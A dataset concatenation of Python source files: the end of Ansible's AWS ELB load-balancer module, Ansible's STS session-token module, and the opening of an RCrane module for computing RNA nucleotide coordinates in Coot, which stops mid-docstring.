policy.append(self._policy_name(policy_attrs['type']))
self._set_stickiness_policy(elb_info, listeners_dict, policy, **policy_attrs)
elif not self.module.boolean(self.stickiness['enabled']):
if len(elb_info.policies.lb_cookie_stickiness_policies):
if elb_info.policies.lb_cookie_stickiness_policies[0].policy_name == self._policy_name(policy_type):
self.changed = True
else:
self.changed = False
self._set_listener_policy(listeners_dict)
self._delete_policy(self.elb.name, self._policy_name(policy_type))
elif self.stickiness['type'] == 'application':
policy = []
policy_type = 'AppCookieStickinessPolicyType'
if self.module.boolean(self.stickiness['enabled']):
if 'cookie' not in self.stickiness:
self.module.fail_json(msg='cookie must be set when type is application')
policy_attrs = {
'type': policy_type,
'attr': 'app_cookie_stickiness_policies',
'method': 'create_app_cookie_stickiness_policy',
'dict_key': 'cookie_name',
'param_value': self.stickiness['cookie']
}
policy.append(self._policy_name(policy_attrs['type']))
self._set_stickiness_policy(elb_info, listeners_dict, policy, **policy_attrs)
elif not self.module.boolean(self.stickiness['enabled']):
if len(elb_info.policies.app_cookie_stickiness_policies):
if elb_info.policies.app_cookie_stickiness_policies[0].policy_name == self._policy_name(policy_type):
self.changed = True
self._set_listener_policy(listeners_dict)
self._delete_policy(self.elb.name, self._policy_name(policy_type))
else:
self._set_listener_policy(listeners_dict)
def _get_backend_policies(self):
"""Get a list of backend policies"""
policies = []
if self.elb.backends is not None:
for backend in self.elb.backends:
if backend.policies is not None:
for policy in backend.policies:
policies.append(str(backend.instance_port) + ':' + policy.policy_name)
return policies
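    # Each entry is formatted as '<instance_port>:<policy_name>', e.g.
    # '80:ProxyProtocol-policy', which is the exact form that
    # _set_backend_policies() checks for below.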
def _set_backend_policies(self):
"""Sets policies for all backends"""
ensure_proxy_protocol = False
replace = []
backend_policies = self._get_backend_policies()
# Find out what needs to be changed
for listener in self.listeners:
want = False
if 'proxy_protocol' in listener and listener['proxy_protocol']:
ensure_proxy_protocol = True
want = True
if str(listener['instance_port']) + ':ProxyProtocol-policy' in backend_policies:
if not want:
replace.append({'port': listener['instance_port'], 'policies': []})
elif want:
replace.append({'port': listener['instance_port'], 'policies': ['ProxyProtocol-policy']})
# enable or disable proxy protocol
if ensure_proxy_protocol:
self._set_proxy_protocol_policy()
# Make the backend policies so
for item in replace:
self.elb_conn.set_lb_policies_of_backend_server(self.elb.name, item['port'], item['policies'])
self.changed = True
def _get_proxy_protocol_policy(self):
"""Find out if the elb has a proxy protocol enabled"""
if self.elb.policies is not None and self.elb.policies.other_policies is not None:
for policy in self.elb.policies.other_policies:
if policy.policy_name == 'ProxyProtocol-policy':
return policy.policy_name
return None
def _set_proxy_protocol_policy(self):
"""Install a proxy protocol policy if needed"""
proxy_policy = self._get_proxy_protocol_policy()
if proxy_policy is None:
self.elb_conn.create_lb_policy(
self.elb.name, 'ProxyProtocol-policy', 'ProxyProtocolPolicyType', {'ProxyProtocol': True}
)
self.changed = True
# TODO: remove proxy protocol policy if not needed anymore? There is no side effect to leaving it there
def _diff_list(self, a, b):
"""Find the entries in list a that are not in list b"""
b = set(b)
return [aa for aa in a if aa not in b]
def _get_instance_ids(self):
"""Get the current list of instance ids installed in the elb"""
instances = []
if self.elb.instances is not None:
for instance in self.elb.instances:
instances.append(instance.id)
return instances
def _set_instance_ids(self):
"""Register or deregister instances from an lb instance"""
assert_instances = self.instance_ids or []
has_instances = self._get_instance_ids()
add_instances = self._diff_list(assert_instances, has_instances)
if add_instances:
self.elb_conn.register_instances(self.elb.name, add_instances)
self.changed = True
if self.purge_instance_ids:
remove_instances = self._diff_list(has_instances, assert_instances)
if remove_instances:
self.elb_conn.deregister_instances(self.elb.name, remove_instances)
self.changed = True
def _set_tags(self):
"""Add/Delete tags"""
if self.tags is None:
return
params = {'LoadBalancerNames.member.1': self.name}
tagdict = dict()
# get the current list of tags from the ELB, if ELB exists
if self.elb:
current_tags = self.elb_conn.get_list('DescribeTags', params,
[('member', Tag)])
tagdict = dict((tag.Key, tag.Value) for tag in current_tags
if hasattr(tag, 'Key'))
# Add missing tags
dictact = dict(set(self.tags.items()) - set(tagdict.items()))
if dictact:
for i, key in enumerate(dictact):
params['Tags.member.%d.Key' % (i + 1)] = key
params['Tags.member.%d.Value' % (i + 1)] = dictact[key]
self.elb_conn.make_request('AddTags', params)
self.changed=True
# Remove extra tags
dictact = dict(set(tagdict.items()) - set(self.tags.items()))
if dictact:
for i, key in enumerate(dictact):
params['Tags.member.%d.Key' % (i + 1)] = key
self.elb_conn.make_request('RemoveTags', params)
self.changed=True
def _get_health_check_target(self):
"""Compose target string from healthcheck parameters"""
protocol = self.health_check['ping_protocol'].upper()
path = ""
if protocol in ['HTTP', 'HTTPS'] and 'ping_path' in self.health_check:
path = self.health_check['ping_path']
return "%s:%s%s" % (protocol, self.health_check['ping_port'], path)
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(dict(
state={'required': True, 'choices': ['present', 'absent']},
name={'required': True},
listeners={'default': None, 'required': False, 'type': 'list'},
purge_listeners={'default': True, 'required': False, 'type': 'bool'},
instance_ids={'default': None, 'required': False, 'type': 'list'},
purge_instance_ids={'default': False, 'required': False, 'type': 'bool'},
zones={'default': None, 'required': False, 'type': 'list'},
purge_zones={'default': False, 'required': False, 'type': 'bool'},
security_group_ids={'default': None, 'required': False, 'type': 'list'},
security_group_names={'default': None, 'required': False, 'type': 'list'},
health_check={'default': None, 'required': False, 'type': 'dict'},
subnets={'default': None, 'required': False, 'type': 'list'},
purge_subnets={'default': False, 'required': False, 'type': 'bool'},
scheme={'default': 'internet-facing', 'required': False},
connection_draining_timeout={'default': None, 'required': False, 'type': 'int'},
idle_timeout={'default': None, 'type': 'int', 'required': False},
cross_az_load_balancing={'default': None, 'type': 'bool', 'required': False},
stickiness={'default': None, 'required': False, 'type': 'dict'},
access_logs={'default': None, 'required': False, 'type': 'dict'},
wait={'default': False, 'type': 'bool', 'required': False},
wait_timeout={'default': 60, 'type': 'int', 'required': False},
tags={'default': None, 'required': False, 'type': 'dict'}
)
)
module = AnsibleModule(
argument_spec=argument_spec,
mutually_exclusive = [['security_group_ids', 'security_group_names']]
)
if not HAS_BOTO:
module.fail_json(msg='boto required for this module')
region, ec2_url, aws_connect_params = get_aws_connection_info(module)
if not region:
module.fail_json(msg="Region must be specified as a parameter, in EC2_REGION or AWS_REGION environment variables or in boto configuration file")
name = module.params['name']
state = module.params['state']
listeners = module.params['listeners']
purge_listeners = module.params['purge_listeners']
instance_ids = module.params['instance_ids']
purge_instance_ids = module.params['purge_instance_ids']
zones = module.params['zones']
purge_zones = module.params['purge_zones']
security_group_ids = module.params['security_group_ids']
security_group_names = module.params['security_group_names']
health_check = module.params['health_check']
access_logs = module.params['access_logs']
subnets = module.params['subnets']
purge_subnets = module.params['purge_subnets']
scheme = module.params['scheme']
connection_draining_timeout = module.params['connection_draining_timeout']
idle_timeout = module.params['idle_timeout']
cross_az_load_balancing = module.params['cross_az_load_balancing']
stickiness = module.params['stickiness']
wait = module.params['wait']
wait_timeout = module.params['wait_timeout']
tags = module.params['tags']
if state == 'present' and not listeners:
module.fail_json(msg="At least one listener is required for ELB creation")
if state == 'present' and not (zones or subnets):
module.fail_json(msg="At least one availability zone or subnet is required for ELB creation")
if wait_timeout > 600:
module.fail_json(msg='wait_timeout maximum is 600 seconds')
if security_group_names:
security_group_ids = []
try:
ec2 = connect_to_aws(boto.ec2, region, **aws_connect_params)
if subnets: # We have at least one subnet, ergo this is a VPC
vpc_conn = _get_vpc_connection(module=module, region=region, aws_connect_params=aws_connect_params)
vpc_id = vpc_conn.get_all_subnets([subnets[0]])[0].vpc_id
filters = {'vpc_id': vpc_id}
else:
filters = None
grp_details = ec2.get_all_security_groups(filters=filters)
for group_name in security_group_names:
if isinstance(group_name, basestring):
group_name = [group_name]
group_id = [ str(grp.id) for grp in grp_details if str(grp.name) in group_name ]
security_group_ids.extend(group_id)
except boto.exception.NoAuthHandlerFound as e:
module.fail_json(msg = str(e))
elb_man = ElbManager(module, name, listeners, purge_listeners, zones,
purge_zones, security_group_ids, health_check,
subnets, purge_subnets, scheme,
connection_draining_timeout, idle_timeout,
cross_az_load_balancing,
access_logs, stickiness, wait, wait_timeout, tags,
region=region, instance_ids=instance_ids, purge_instance_ids=purge_instance_ids,
**aws_connect_params)
# check for unsupported attributes for this version of boto
if cross_az_load_balancing and not elb_man._check_attribute_support('cross_zone_load_balancing'):
module.fail_json(msg="You must install boto >= 2.18.0 to use the cross_az_load_balancing attribute")
if connection_draining_timeout and not elb_man._check_attribute_support('connection_draining'):
module.fail_json(msg="You must install boto >= 2.28.0 to use the connection_draining_timeout attribute")
if idle_timeout and not elb_man._check_attribute_support('connecting_settings'):
module.fail_json(msg="You must install boto >= 2.33.0 to use the idle_timeout attribute")
if state == 'present':
elb_man.ensure_ok()
elif state == 'absent':
elb_man.ensure_gone()
ansible_facts = {'ec2_elb': 'info'}
ec2_facts_result = dict(changed=elb_man.changed,
elb=elb_man.get_info(),
ansible_facts=ansible_facts)
module.exit_json(**ec2_facts_result)
if __name__ == '__main__':
main()
|
dav1x/ansible
|
lib/ansible/modules/cloud/amazon/ec2_elb_lb.py
|
Python
|
gpl-3.0
| 53,260
|
#!/usr/bin/python
# Copyright: Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['stableinterface'],
'supported_by': 'certified'}
DOCUMENTATION = '''
---
module: sts_session_token
short_description: Obtain a session token from the AWS Security Token Service
description:
- Obtain a session token from the AWS Security Token Service
version_added: "2.2"
author: Victor Costan (@pwnall)
options:
duration_seconds:
description:
- The duration, in seconds, of the session token.
See http://docs.aws.amazon.com/STS/latest/APIReference/API_GetSessionToken.html#API_GetSessionToken_RequestParameters
for acceptable and default values.
required: false
default: null
mfa_serial_number:
description:
- The identification number of the MFA device that is associated with the user who is making the GetSessionToken call.
required: false
default: null
mfa_token:
description:
- The value provided by the MFA device, if the trust policy of the user requires MFA.
required: false
default: null
notes:
- In order to use the session token in a following playbook task you must pass the I(access_key), I(access_secret) and I(access_token).
extends_documentation_fragment:
- aws
- ec2
requirements:
- boto3
- botocore
- python >= 2.6
'''
RETURN = """
sts_creds:
description: The Credentials object returned by the AWS Security Token Service
returned: always
type: list
sample:
access_key: ASXXXXXXXXXXXXXXXXXX
expiration: "2016-04-08T11:59:47+00:00"
secret_key: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
session_token: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
changed:
description: True if obtaining the credentials succeeds
type: bool
returned: always
"""
EXAMPLES = '''
# Note: These examples do not set authentication details, see the AWS Guide for details.
# Get a session token (more details: http://docs.aws.amazon.com/STS/latest/APIReference/API_GetSessionToken.html)
sts_session_token:
  duration_seconds: 3600
register: session_credentials
# Use the session token obtained above to tag an instance in account 123456789012
ec2_tag:
aws_access_key: "{{ session_credentials.sts_creds.access_key }}"
aws_secret_key: "{{ session_credentials.sts_creds.secret_key }}"
security_token: "{{ session_credentials.sts_creds.session_token }}"
resource: i-xyzxyz01
state: present
tags:
MyNewTag: value
'''
try:
import boto3
from botocore.exceptions import ClientError
HAS_BOTO3 = True
except ImportError:
HAS_BOTO3 = False
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ec2 import boto3_conn, ec2_argument_spec, get_aws_connection_info
def normalize_credentials(credentials):
access_key = credentials.get('AccessKeyId', None)
secret_key = credentials.get('SecretAccessKey', None)
session_token = credentials.get('SessionToken', None)
expiration = credentials.get('Expiration', None)
return {
'access_key': access_key,
'secret_key': secret_key,
'session_token': session_token,
'expiration': expiration
}
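# The keys above come from the 'Credentials' structure returned by the STS
# GetSessionToken call (AccessKeyId, SecretAccessKey, SessionToken,
# Expiration), renamed to the snake_case keys exposed to playbooks as
# sts_creds.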
def get_session_token(connection, module):
duration_seconds = module.params.get('duration_seconds')
mfa_serial_number = module.params.get('mfa_serial_number')
mfa_token = module.params.get('mfa_token')
changed = False
args = {}
if duration_seconds is not None:
args['DurationSeconds'] = duration_seconds
if mfa_serial_number is not None:
args['SerialNumber'] = mfa_serial_number
if mfa_token is not None:
args['TokenCode'] = mfa_token
try:
response = connection.get_session_token(**args)
changed = True
except ClientError as e:
        module.fail_json(msg=str(e))
credentials = normalize_credentials(response.get('Credentials', {}))
module.exit_json(changed=changed, sts_creds=credentials)
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(
dict(
duration_seconds = dict(required=False, default=None, type='int'),
mfa_serial_number = dict(required=False, default=None),
mfa_token = dict(required=False, default=None)
)
)
module = AnsibleModule(argument_spec=argument_spec)
if not HAS_BOTO3:
module.fail_json(msg='boto3 and botocore are required.')
region, ec2_url, aws_connect_kwargs = get_aws_connection_info(module, boto3=True)
if region:
connection = boto3_conn(module, conn_type='client', resource='sts', region=region, endpoint=ec2_url, **aws_connect_kwargs)
else:
module.fail_json(msg="region must be specified")
get_session_token(connection, module)
if __name__ == '__main__':
main()
|
nrwahl2/ansible
|
lib/ansible/modules/cloud/amazon/sts_session_token.py
|
Python
|
gpl-3.0
| 5,043
|
#!/usr/bin/env python
"""Functions for calculating nucleotide coordinates"""
# Copyright 2010, 2011, 2012 Kevin Keating
#
# Licensed under the Educational Community License, Version 2.0 (the
# "License"); you may not use this file except in compliance with the
# License. You may obtain a copy of the License at
#
# http://www.osedu.org/licenses/ECL-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an "AS IS"
# BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
# or implied. See the License for the specific language governing
# permissions and limitations under the License.
import os.path
import re
import gtk
from copy import deepcopy
#from time import sleep #for debugging
#from pprint import pprint #for debugging
from coot import refinement_immediate_replacement_state, set_refinement_immediate_replacement, accept_regularizement, clear_all_fixed_atoms, add_extra_torsion_restraint, set_refine_with_torsion_restraints, refine_with_torsion_restraints_state, matrix_state, set_matrix, delete_all_extra_restraints, add_extra_start_pos_restraint, refine_zone, set_use_only_extra_torsion_restraints_for_torsions
from coot import svn_revision #needed to see if Coot is new enough for Phenix restraints
from coot import monomer_restraints_py as monomer_restraints
from coot import set_monomer_restraints_py as set_monomer_restraints
from coot import refine_residues_py as refine_residues
from coot import refine_zone_with_score_py as refine_zone_with_score
from coot import mark_multiple_atoms_as_fixed_py as mark_multiple_atoms_as_fixed
#regularize_zone_with_score_py only exists in Coot newer than 3728 (0.7-pre)
#so we won't be able to find it in Coot 0.6.2
#this function is only used in Rotamerize without density, and the menu option for that won't be created
#unless Coot is newer than 3728
#so we can safely ignore the ImportError
try:
from coot import regularize_zone_with_score_py as regularize_zone_with_score
except ImportError:
pass
#use_only_extra_torsion_restraints_for_torsions_state() only exists in Coot newer than ~3902
#if the function doesn't exist, then just assume that this variable was turned off
#(since RCrane is probably the only thing that uses it)
try:
from coot import use_only_extra_torsion_restraints_for_torsions_state
except ImportError:
def use_only_extra_torsion_restraints_for_torsions_state(): return 0
from buildInitSugar import BuildInitSugar, rotateSugar
from puckerList import puckerList
from buildPhosOxy import buildPhosOxy, buildInitOrTerminalPhosOxy
from rotData import RotDataLoader
from puckerList import puckerList
from guiUtils import HBOX_SPACING, VBOX_SPACING, createRCraneWindowObject
import phenixRestraints
#initialize a BuildInitSugar object when this module is loaded
rcranePath = os.path.dirname(os.path.abspath(__file__))
dataPath = os.path.join(rcranePath, "data")
sugarBuilder = BuildInitSugar(c3pStruc = os.path.join(dataPath, "c3p.pdb"),
c2pStruc = os.path.join(dataPath, "c2p.pdb"))
#initialize a rotData object when this module is loaded
rotData = RotDataLoader(os.path.join(dataPath, "dihedData.csv"))
TORSION_STD_DEV_MOD = 0.1 #for minimization restraints, all the standard deviations for all rotamer torsions are multiplied by this number
MANUAL_TORSION_STD_DEV = 2 #when rotamerizing an already existing structure, this will be used as the standard deviation for the
#non-predicted torsions (i.e. the first and last half-nucleotides)
#the standard deviations for the harmonic (start position) restraints
#the larger the number, the more freedom the restrained atoms have to move
HARMONIC_STD_DEV_PHOSPHATE = 0.25 #for phosphates
HARMONIC_STD_DEV_BASE = 0.1 #for base atoms
#sugar torsions for C3' and C2' sugars (taken from Phenix (phenix/1.6.2-432/phenix-1.6.2-432/chem_data/geostd/rna_dna/mod_rna2p.cif and mod_rna3p.cif))
NU0_C3 = 3.0
NU1_C3 = 335.0
NU4_C3 = 145.0 #Coot refers to C5'-C4'-O4'-C1' as nu4. I think nu4 is actually C3'-C4'-O4'-C1'.
#We're using the C5' version of the torsion here
NU0_C2 = 339.0
NU1_C2 = 35.0
NU4_C2 = 123.0
#TODO: use realnu4 and wasnu4? that's what Phenix uses
#torsions for chi (also taken from Phenix)
CHI_MEAN = -123.0
CHI_STD_DEV = 24.3
NU_STD_DEV = 4 #Coot default is 40, but we want to make sure that the sugars don't get flattened
#TODO: try a value of 8 here? that's what Phenix uses
REFINE_MAP_WEIGHT = 10 #the weight of the map term during the minimization (Coot default is 60)
                       #if this value is too high, Coot will distort the sugar to try to fit the O2' into density
#TODO: try to balance this value against NU_STD_DEV
SYN_REBUILDING_CUTOFF = 3 #any minimization scores above this will cause the minimization to be restarted using a syn sugar
HIGH_ANTI_REBUILDING_CUTOFF = 8 #if both the anti and the syn minimizations are above this score, then the minimization
#will be restarted using a high-anti sugar
REFINEMENT_FAIL_SCORE = 99999 #what score to assign a minimization that didn't return a score (which means that the refinement failed)
PRINT_SUMMARY_TABLE = False #whether to print a summary table of minimization scores
#note that setting rcrane_debug to True before launching RCrane will set PRINT_SUMMARY_TABLE to True
#(launch.py will set PRINT_SUMMARY_TABLE after loading this module)
#atoms to not fix during minimization
PREV_RES_MOBILE_ATOMS = frozenset(["O3'"]) #OP1 and OP2 may be added at runtime
CUR_RES_MOBILE_ATOMS = frozenset("P C2' O2' C3' O3' C4' O4' C5' O5'".split(" ")) #C1' should be the only restrained backbone atom
NEXT_RES_MOBILE_ATOMS = frozenset("P O5' OP1 OP2".split(" ")) #The O5' will only be present if the next residue is already built
#default to using the Coot/CCP4 restraints, as opposed to Phenix's pucker-specific restraints
#This default may change in the future
USE_PHENIX_RESTRAINTS = False
PHENIX_NEW_RESTRAINT_ATOMS = frozenset("N1 N9 C1' C2' O2' C3' O3' C4' O4' C5' O5' P OP1 OP2".split(" "))
#bond and angle restraints where all atoms are on this list will be rewritten if USE_PHENIX_RESTRAINTS is True
def calcCoords(builtChain, bestPath, pseudoMol, window):
"""Calculate coordinates for a chain of nucleotides
ARGUMENTS:
builtChain - a chain object containing phosphate and base coordinates for all nucleotides to be built
bestPath - a list of the desired conformers to be built
pseudoMol - a pseudoMolecule object currently being used to display the chain
        window - the window containing the GUI
RETURNS:
intermediateAtomLocs - phosphate and O3' coordinates for each nucleotide immediately before minimization of that nucleotide was started
minimizationScores - a list of the minimization scores for each nucleotide
NOTE:
        If only a single nucleotide is being built, then we don't have a full suite, so there are no conformers
In this case, bestPath should be a scalar containing the intended pucker of the nucleotide to be built
"""
#put a progress bar in window
progressDialog = ProgressDialogObject(window, builtChain.numNucs()-1)
#we're going to have to change some Coot settings during the coordinate calculation
#so check what the existing values are so we can set them back
origCootSettings = __changeCootSettings()
intermediateAtomLocs = None
minimizationScores = None
#enclose the rest of the function in a try clause so that we can still reset the Coot variables even if something goes wrong
try:
#for x in (1,):
if builtChain.numNucs() == 1:
#if there's only one nucleotide, then there's nothing we can do (the nucleotide should contain only a phosphate)
return
elif builtChain.numNucs() == 2:
#if there are two nucleotides, then we have a single sugar with both a 5' and a 3' phosphate
#we can't determine a conformer, but we can predict the sugar pucker and minimize things without any torsions
__minCoords(pseudoMol, #pseudoMolecule object
None, None, 1, 2, #residue numbers
None, None, #rotamers
None, builtChain.nucleotides[0].type, None, #residue types
builtChain.nucleotides[0].atoms, #atomic coordinates
pucker = bestPath, nextResAtoms = builtChain.nucleotides[1].atoms)
else:
#if we recalculate coordinates later, we want to mimic the conditions of this minimization as closely as possible
#this means we need to store intermediate locations for the phophate and O3'
#(i.e. for phosphate i, we need to store it's location after minimizing nucleotide i-1 but before minimizing nucleotide i)
#the first phosphate doesn't have an intermediate location, so just store None for that nucleotide
intermediateAtomLocs = [None]
minimizationScores = []
#build the first nucleotide (don't put torsional constraints on the initial alpha, beta, and gamma)
#minimize the structure
(newCoords, score) = __minCoords(pseudoMol, #pseudoMolecule object
None, None, 1, 2, #residue numbers
None, bestPath[0], #rotamers
None, builtChain.nucs[0].type, builtChain.nucs[1].type, #residue types
builtChain.nucs[0].atoms) #atomic coordinates
#update the builtChain object with the new coordinates
(builtChain.nucs[0].atoms, builtChain.nucs[1].atoms) = newCoords
#store the phosphate and previous O3' location
intermediateAtomLocs.append([builtChain.nucs[1].atoms["P"], builtChain.nucs[0].atoms["O3'"], builtChain.nucs[0].atoms["C3'"]])
minimizationScores.append(score)
#increment the progress bar
progressDialog.progress()
#return
fixPrevPhosOxy = True #don't minimize the first previous phosphoryl oxygens since it's going to take a long time and isn't
#going to make them any more accurate since there's no O3' to use to position them
            #build the middle nucleotides
for resNum in xrange(1, len(bestPath)):
#minimize the structure
(newCoords, score) = __minCoords(pseudoMol, #pseudoMolecule object
resNum-1 or None, resNum, resNum+1, resNum+2, #residue numbers
bestPath[resNum-1], bestPath[resNum], #rotamers
builtChain.nucs[resNum-1].type, builtChain.nucs[resNum].type, builtChain.nucs[resNum+1].type, #residue types
builtChain.nucs[resNum].atoms, #atomic coordinates
fixPrevPhosOxy = fixPrevPhosOxy)
#update the builtChain object with the new coordinates
(builtChain.nucs[resNum-1].atoms, builtChain.nucs[resNum].atoms, builtChain.nucs[resNum+1].atoms) = newCoords
#store the phosphate location
intermediateAtomLocs.append([builtChain.nucs[resNum+1].atoms["P"], builtChain.nucs[resNum].atoms["O3'"], builtChain.nucs[resNum].atoms["C3'"]])
minimizationScores.append(score)
progressDialog.progress() #increment the progress bar
fixPrevPhosOxy = False #minimize all of the non-bridging oxygens from here on
#build the last nucleotide (don't put torsional constraints on the final epsilon and zeta)
resNum = len(bestPath)
#minimize the structure
(newCoords, score) = __minCoords(pseudoMol, #pseudoMolecule object
resNum-1 or None, resNum, resNum+1, resNum+2, #residue numbers
bestPath[resNum-1], None, #rotamers
builtChain.nucs[resNum-1].type, builtChain.nucs[resNum].type, None, #residue types
builtChain.nucs[resNum].atoms, #atomic coordinates
fixPrevPhosOxy = fixPrevPhosOxy)
#update the builtChain object with the new coordinates
(builtChain.nucs[resNum-1].atoms, builtChain.nucs[resNum].atoms, builtChain.nucs[resNum+1].atoms) = newCoords
minimizationScores.append(score)
#increment the progress bar before we do the last thing so that the user sees it at 100% for a few seconds
progressDialog.progress()
#We no longer minimize the terminal phosphoryl oxygens, since it occasionally takes a long time and doesn't seem
#to improve their placement much.
finally:
#restore the original Coot settings even if something went wrong during the minimization
__restoreCootSettings(origCootSettings)
#only draw extra bonds if the user is going to be presented with a GUI
#otherwise, there won't be any way to delete the extra bonds
if builtChain.numNucs() > 2:
pseudoMol.drawExtraBonds()
return (intermediateAtomLocs, minimizationScores)
def recalcCoords(startingRes, endingRes, rots, origCoords, pseudoMol, window, ignoreDensity = False):
"""Recalculate coordinates (using different rotamers) for part of a chain of nucleotides starting with a chain built by calcCoords
ARGUMENTS:
startingRes - the first residue to rebuild
endingRes - the last residue to rebuild
rots - what rotamers to use for the rebuild
origCoords - a chain object containing the current coordinates
pseudoMol - a pseudoMolecule object currently being used to display the chain
window - the window containing the GUI
OPTIONAL ARGUMENTS:
ignoreDensity - ignore the density when performing the minimization
defaults to False
RETURNS:
intermediateAtomLocs - phosphate and O3' coordinates for each nucleotide immediately before minimization of that nucleotide was started
minimizationScores - a list of the minimization scores for each nucleotide
NOTE:
Currently, the return values from this function are only used for initial rotamerize minimization. They are ignored for all
other calls to this function
"""
#convert the starting and ending residues to indices
startingResIndex = origCoords.resIndex(startingRes)
endingResIndex = origCoords.resIndex(endingRes)
#print "Indices:", startingResIndex, ",", endingResIndex
progressDialog = ProgressDialogObject(window, endingResIndex - startingResIndex + 1)
#without this line, the progress dialog isn't shown (at least on Windows) until after the atoms are frozen
while gtk.events_pending(): gtk.main_iteration(False)
#we're going to have to change some Coot settings during the coordinate calculation
#so check what the existing values are so we can set them back
origCootSettings = __changeCootSettings()
builtChain = deepcopy(origCoords) #we don't want to modify this object
print "Recalculating ", startingRes, "-", endingRes
#from time import sleep; sleep(3)
#initialize intermediateAtomLocs (the first nucleotide doesn't have an intermediate location)
intermediateAtomLocs = [None]
minimizationScores = []
try:
if startingResIndex == 0:
#if we're at the first nucleotide of the chain (or we're right after a chain break)
print "Rebuilding initial nucleotide"
#if we have to build the first nucleotide of the chain
#minimize the structure
(newCoords, score) = __minCoords(pseudoMol, #pseudoMolecule object
None, None, startingRes, builtChain.nucs[1].resNum, #residue numbers
None, rots[1], #rotamers
None, builtChain.nucleotides[0].type, builtChain.nucleotides[1].type, #residue types
builtChain.nucleotides[0].atoms, #atomic coordinates
ignoreDensity = ignoreDensity)
#update the builtChain object with the new coordinates
(builtChain.nucleotides[0].atoms, builtChain.nucleotides[1].atoms) = newCoords
intermediateAtomLocs.append([builtChain.nucs[1].atoms["P"], builtChain.nucs[0].atoms["O3'"], builtChain.nucs[0].atoms["C3'"]])
minimizationScores.append(score)
startingResIndex += 1
rotsIndex = 2
#increment the progress bar
progressDialog.progress()
else:
rotsIndex = 1
fixPrevPhosOxy = True #don't minimize the first previous phosphoryl oxygens
#if we just built the first nucleotide, then minimizing them is going to take a long time and isn't going to make them
#any more accurate since there's no O3' to use to position them
#if we didn't just build the first nucleotide, then we don't want to adjust the non-bridging oxygens that are outside
#of our minimization range
for resIndex in xrange(startingResIndex, endingResIndex):
#minimize the structure
(newCoords, score) = __minCoords(pseudoMol, #pseudoMolecule object
builtChain.nucs[resIndex-2].resNum if resIndex > 1 else None, builtChain.nucs[resIndex-1].resNum, builtChain.nucs[resIndex].resNum, builtChain.nucs[resIndex+1].resNum, #residue numbers
rots[rotsIndex-1], rots[rotsIndex], #rotamers
builtChain.nucs[resIndex-1].type, builtChain.nucs[resIndex].type, builtChain.nucs[resIndex+1].type, #residue types
builtChain.nucs[resIndex].atoms, #atomic coordinates
fixPrevPhosOxy = fixPrevPhosOxy, #if this is the first residue that we're rebuilding but not the first residue
#of the chain, then don't move the non-bridging oxygens of the previous residue
ignoreDensity = ignoreDensity)
#update the builtChain object with the new coordinates
(builtChain.nucleotides[resIndex-1].atoms, builtChain.nucleotides[resIndex].atoms, builtChain.nucleotides[resIndex+1].atoms) = newCoords
intermediateAtomLocs.append([builtChain.nucs[resIndex+1].atoms["P"], builtChain.nucs[resIndex].atoms["O3'"], builtChain.nucs[resIndex].atoms["C3'"]])
minimizationScores.append(score)
#increment the progress bar
progressDialog.progress()
rotsIndex += 1
firstRes = False
fixPrevPhosOxy = False #minimize all of the non-bridging oxygens from here on
resIndex = endingResIndex
#for the last rebuilt nucleotide, we have to call __minCoords with nextResAlreadyBuilt=True
#we don't need to worry about doing anything special if this is the last suite of the chain, though, since the 3' phosphoryl oxygens are already built
#only do this if we have a final 3' phosphate
#minimize the structure
if (resIndex + 1) < len(builtChain.nucs):
#print "*****Minimizing last nt*****"
#from time import sleep; sleep(3)
(newCoords, score) = __minCoords(pseudoMol, #pseudoMolecule obj
builtChain.nucs[resIndex-2].resNum if resIndex > 1 else None, builtChain.nucs[resIndex-1].resNum, builtChain.nucs[resIndex].resNum, builtChain.nucs[resIndex+1].resNum, #residue numbers
rots[rotsIndex-1], rots[rotsIndex], #rotamers
builtChain.nucs[resIndex-1].type, builtChain.nucs[resIndex].type, builtChain.nucs[resIndex+1].type, #residue types
builtChain.nucs[resIndex].atoms, #atomic coordinates
nextResAlreadyBuilt=True, fixPrevPhosOxy = fixPrevPhosOxy, ignoreDensity = ignoreDensity)
#update the builtChain object with the new coordinates
(builtChain.nucleotides[resIndex-1].atoms, builtChain.nucleotides[resIndex].atoms, builtChain.nucleotides[resIndex+1].atoms) = newCoords
minimizationScores.append(score)
#increment the progress bar (even though the user probably won't actually see this, since it will be replaced almost immediately by the review suites GUI)
progressDialog.progress()
#don't bother to do a separate minimization run for the phosphoryl oxygens of the final nucleotide. They should be good enough
finally:
__restoreCootSettings(origCootSettings) #restore the original Coot settings even if something went wrong during the minimization
progressDialog.restoreWindow() #never return from this function without running restoreWindow()
#GTK can crash Coot if it tries to update a GUI element that had been removed from the window and not restored (and possibly gone out of scope)
pseudoMol.drawExtraBonds() #redraw overly-long bonds for the entire molecule
return (intermediateAtomLocs, minimizationScores)
def __minCoords(pseudoMol, prevPrevResNum, prevResNum, curResNum, nextResNum, curRot, nextRot, prevResType, curResType, nextResType, curResAtoms, nextResAlreadyBuilt = False, fixPrevPhosOxy = False, pucker = None, nextResAtoms = None, ignoreDensity = False):
"""Build a single nucleotide and minimize its coordinates.
ARGUMENTS:
pseudoMol - the pseudoMolecule object currently being used to display the chain
prevPrevResNum - the residue number of residue i-2
only used if we're using Phenix's pucker-specific restraints, in which case it's needed
to restrain the non-bridging oxygens of residue prevResNum
prevResNum - the residue number of the previous residue using Coot numbering (i.e. starting at 1, not 0)
curResNum - the residue number to build using Coot numbering (i.e. starting at 1, not 0)
nextResNum - the residue number of the next residue using Coot numbering (i.e. starting at 1, not 0)
curRot - the rotamer to use when building the current residue
nextRot - the rotamer to use when building the next residue
prevResType - the residue type (i.e. A, G, C, or U) of the previous residue
curResType - the residue type (i.e. A, G, C, or U) of the current residue
nextResType - the residue type (i.e. A, G, C, or U) of the next residue
curResAtoms - a hash of atom coordinates for the current residue
OPTIONAL ARGUMENTS:
